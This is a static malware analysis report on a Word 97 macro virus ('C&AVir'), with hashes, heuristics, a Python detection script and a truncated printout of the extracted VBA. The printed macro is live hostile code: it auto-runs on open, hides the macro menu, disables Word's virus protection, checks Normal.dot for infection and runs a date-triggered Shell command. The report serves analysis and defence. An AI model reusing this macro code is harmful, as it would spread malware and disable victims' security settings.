Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7a20b06a860880ff…

MALICIOUS

Office (OLE)

Size: 49.5 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14

MD5:     7ed115aab536f1530191bc71c5fcec57
SHA-1:   04988380794eacdfab9c6cfc5a895619e7f81cac
SHA-256: 7a20b06a860880ff9e076ebaa162f57da168cd1af200de50615d79f28965193d

Risk score: 220

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Word 8.0 (Word 97) document whose VBA project runs automatically from the Document_Open subroutine. On open, the macro hides the Tools > Macro menu entry, disables Word's macro virus protection together with the Normal template save prompt, conversion confirmations and backup copies (Options.VirusProtection, Options.SaveNormalPrompt, Options.ConfirmConversions and Options.CreateBackup are all set to 0), and then searches the code modules of both the active document and the Normal template (ActiveDocument.VBProject and NormalTemplate.VBProject) for the marker string "Este Es <C&AVir>". That marker test is the infection check of a classic self-replicating Word macro virus that spreads through Normal.dot; the comment "New Era of C&AVir" and the Spanish-language identifiers (Sw_Doc_Infec, Activa_Pln, Acci_Arch) fit the same picture. The replication routine itself lies beyond the truncated preview. The only Shell() call in the visible code does not download anything: once the date is past VBA serial 36433 (30 September 1999) and only on the first day of a month, it runs command.com /c dir with a randomly chosen pattern (*.doc, *.bat, *.sys or *.ini) and appends the recursive listing from the root of the drive to a file named IOBuff<n>.vxd. A second, date- and minute-triggered branch applies nuisance payloads instead: switching Word to white-on-blue display (Options.BlueScreen), turning off spelling and grammar marks, forcing line numbering and lowercase Roman page numbers, hiding the scroll bars and appending " - Pura Basura!!" to the window caption before saving the document. No network or download capability appears anywhere in the extracted source.

Heuristics (5)

  • ClamAV: Doc.Trojan.Marker-42 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-42
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
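The heuristics above operate on the OLE streams; the following script is an added example (not the analysis platform's code and not part of oletools) that reimplements their source-level counterparts on decoded VBA text: an auto-exec entry point, a Shell() call, macro-security tampering, the VBProject/CodeModule access that template infectors use, and download primitives. It also decodes the numeric date trigger and reconstructs the command lines the Shell call can build. In a real pipeline the source would come from oletools' olevba (as in the macros.bas artifact below); here a constructed, abridged copy of the Document_Open routine from this page is embedded so the scan runs offline. The p-code-only case (OLE_VBA_PCODE_AUTOEXEC_EXEC) needs a p-code disassembler and is out of scope for this example.

```python
"""Source-level triage of an extracted VBA macro (added example, not platform code)."""
import re
from datetime import date, timedelta

# Constructed sample: abridged from the macro preview on this page so the scan runs offline.
SAMPLE_VBA = r'''
Private Sub Document_Open()
  On Error Resume Next
  CommandBars("Tools").Controls("Macro").Visible = False
  Options.VirusProtection = (1 - 1)
  Set Pl = NormalTemplate.VBProject.VBComponents.Item(1)
  Sw_Pln_Infec = Pl.CodeModule.Find(cyav, 1, 1, 10000, 10000)
  If Date > 36433 Then
    parchi = "IOBuff" & pext1 & ".vxd"
    Shell "command.com /c dir \" & pext & "/s/b>>\" & parchi, vbHide
  End If
End Sub
'''

# Word/Excel procedure names that run without user interaction.
AUTOEXEC = re.compile(
    r"\bSub\s+(Document_Open|Document_Close|Document_New|AutoOpen|AutoExec|"
    r"AutoClose|AutoNew|AutoExit|Workbook_Open|Auto_Open)\b", re.I)

# indicator name -> (pattern, severity). Shell must be followed by a quoted
# string or '(' so that the WScript.Shell object is counted separately.
INDICATORS = {
    "shell_exec": (re.compile(r'\bShell(?:\s+"|\s*\()', re.I), "critical"),
    "wscript_shell": (re.compile(r"WScript\.Shell|Shell\.Application", re.I), "critical"),
    "download": (re.compile(r"URLDownloadToFile|XMLHTTP|WinHttp|InternetOpen", re.I), "critical"),
    "macro_security_tamper": (re.compile(r"Options\.VirusProtection\s*=", re.I), "critical"),
    "ui_hiding": (re.compile(r'Controls\("Macro"\)\.(?:Visible|Enabled)\s*=\s*False', re.I), "high"),
    "vbproject_access": (re.compile(r"\.VBProject\.VBComponents", re.I), "high"),
    "codemodule_manipulation": (re.compile(
        r"\.CodeModule\.(?:Find|AddFromString|InsertLines|DeleteLines|Lines)\b", re.I), "high"),
}

VBA_EPOCH = date(1899, 12, 30)  # VBA/OLE date serial 0


def vba_serial_to_date(serial: int) -> date:
    """Convert a VBA date serial (the 36433 in 'If Date > 36433') to a calendar date."""
    return VBA_EPOCH + timedelta(days=serial)


def trigger_dates(src: str):
    """Return the dates behind every numeric 'Date > N' comparison in the source."""
    return [vba_serial_to_date(int(n)) for n in re.findall(r"\bDate\s*>\s*(\d{4,6})\b", src)]


def expand_dir_command(pext: str, pext1: str) -> str:
    """Reconstruct the command line the Shell call builds for one Select Case branch."""
    parchi = "IOBuff" + pext1 + ".vxd"
    return "command.com /c dir \\" + pext + "/s/b>>\\" + parchi


def scan(src: str) -> dict:
    """Count indicators and derive a verdict along the lines of the report's heuristics."""
    entry_points = []
    for m in AUTOEXEC.finditer(src):
        if m.group(1) not in entry_points:
            entry_points.append(m.group(1))
    counts = {name: len(pat.findall(src)) for name, (pat, _) in INDICATORS.items()}
    severities = {INDICATORS[name][1] for name, n in counts.items() if n}
    if entry_points and "critical" in severities:
        verdict = "malicious"      # auto-exec plus execution/tampering capability
    elif entry_points or severities:
        verdict = "suspicious"     # one side of the pairing only
    else:
        verdict = "clean"
    return {"autoexec": entry_points, "indicators": counts, "verdict": verdict}


if __name__ == "__main__":
    report = scan(SAMPLE_VBA)
    print("auto-exec entry points:", report["autoexec"])
    for name, n in report["indicators"].items():
        if n:
            print(f"  {name:<24} x{n}  [{INDICATORS[name][1]}]")
    print("trigger dates:", [d.isoformat() for d in trigger_dates(SAMPLE_VBA)])
    for pext, pext1 in (("*.doc", "1"), ("*.bat", "2"), ("*.sys", "3"), ("*.ini", "4")):
        print("  Shell would run:", expand_dir_command(pext, pext1))
    print("verdict:", report["verdict"])
```

The verdict deliberately requires both halves of the pairing the p-code heuristic describes (an auto-exec token together with an execution token); a document with only Document_Open, or only a Shell call inside an ordinary procedure, is reported as suspicious rather than malicious.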

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   42930 bytes
SHA-256: 055e23ec01d11cc956d14581287c8d74c28c91322e3e4a143ed6112d81f60d12

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
  'New Era of C&AVir. More Powerfull
  On Error Resume Next
  Dim Sw_Doc_Infec, Sw_Pln_Infec, Activa_Doc, Activa_Pln, Acci_Arch, Rompe As Boolean
    Set prevDocument = NormalTemplate
    Set nextDocument = newDocument
  Dim Accion1, Accion2, LinDoc, LinPln, Compara As Integer
  Const cyav = "Este Es <C&AVir>"
  Const pnomus = "***< C & A V i r >***"
  'Initialize variables (original comment: Inicializa Variables)
  Sw_Doc_Infec = False
  Sw_Pln_Infec = False
Activa_Doc = True
Activa_Pln = False
  CommandBars("Tools").Controls("Macro").Enabled = False
  CommandBars("Tools").Controls("Macro").Visible = False
  Options.VirusProtection = (1 - 1)
  Options.SaveNormalPrompt = (1 - 1)
  Options.ConfirmConversions = (1 - 1)
  Options.CreateBackup = (1 - 1)
  Set Dc = ActiveDocument.VBProject.VBComponents.Item(1)
  Set Pl = NormalTemplate.VBProject.VBComponents.Item(1)
  LinPln = Pl.CodeModule.Countoflines
  LinDoc = Dc.CodeModule.Countoflines
  Sw_Pln_Infec = Pl.CodeModule.Find(cyav, 1, 1, 10000, 10000)
  Sw_Doc_Infec = Dc.CodeModule.Find(cyav, 1, 1, 10000, 10000)
  Acci_Arch = False
  Randomize
  If Activa_Doc = True Then
    If Date > 36433 Then
      Dia = Day(Date)
      If Dia = 1 Then
        Ptp = Int(6 * Rnd)
        Select Case Ptp
          Case 1
            Acci_Arch = True
            pext = "*.doc"
            pext1 = "1"
          Case 2
            Acci_Arch = True
            pext = "*.bat"
            pext1 = "2"
          Case 3
            Acci_Arch = True
            pext = "*.sys"
            pext1 = "3"
          Case 4
            Acci_Arch = False
            pext = ""
            pext1 = ""
          Case 5
            Acci_Arch = True
            pext = "*.ini"
            pext1 = "4"
        End Select
        If Acci_Arch = True Then
          parchi = "IOBuff" & pext1 & ".vxd"
          Shell "command.com /c dir \" & pext & "/s/b>>\" & parchi, vbHide
        End If
      End If
      DiaSem = WeekDay(Date)
      DiaSem = DiaSem + 3
      Hacer = Int(DiaSem * Rnd)
      If Hacer = Day(Now) Or (Hacer * 3) = Minute(Now) Then
        Select Case Hacer
          Case 1
            Options.BlueScreen = True
            Options.CheckGrammarAsYouType = False
            Options.CheckSpellingAsYouType = False
            ActiveDocument.ShowGrammaticalErrors = False
            ActiveDocument.ShowSpellingErrors = False
            ActiveDocument.CommandBars.LargeButtons = True
            Application.ActiveWindow.DisplayVerticalScrollBar = False
          Case 2
            With ActiveDocument.PageSetup.LineNumbering
                 .Active = True
                 .StartingNumber = 3
                 .CountBy = 3
                 .RestartMode = wdRestartSection
            End With
            ActiveDocument.Save
            If ActiveDocument.CommandBars.LargeButtons = True Then ActiveDocument.CommandBars.LargeButtons = False
            ActiveDocument.ActiveWindow.Caption = ActiveDocument.ActiveWindow.Caption & " - Pura Basura!!"
            If ActiveDocument.Saved = False Then ActiveDocument.Save
          Case 3
            With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).PageNumbers
                 .NumberStyle = wdPageNumberStyleLowercaseRoman
                 .IncludeChapterNumber = True
                 .RestartNumberingAtSection = True
                 .StartingNumber = 99
                 .Add PageNumberAlignment:=wdAlignPageNumberCenter, FirstPage:=True
            End With
            Application.ActiveWindow.DisplayHorizontalScrollBar = False
            Application.ActiveWindow.DisplayVerticalScrollBar = False
            If ActiveDocument.Saved = False Then ActiveDocument.Save
            If Options.BlueScreen = True Then Options.BlueScreen = False
      
... (truncated)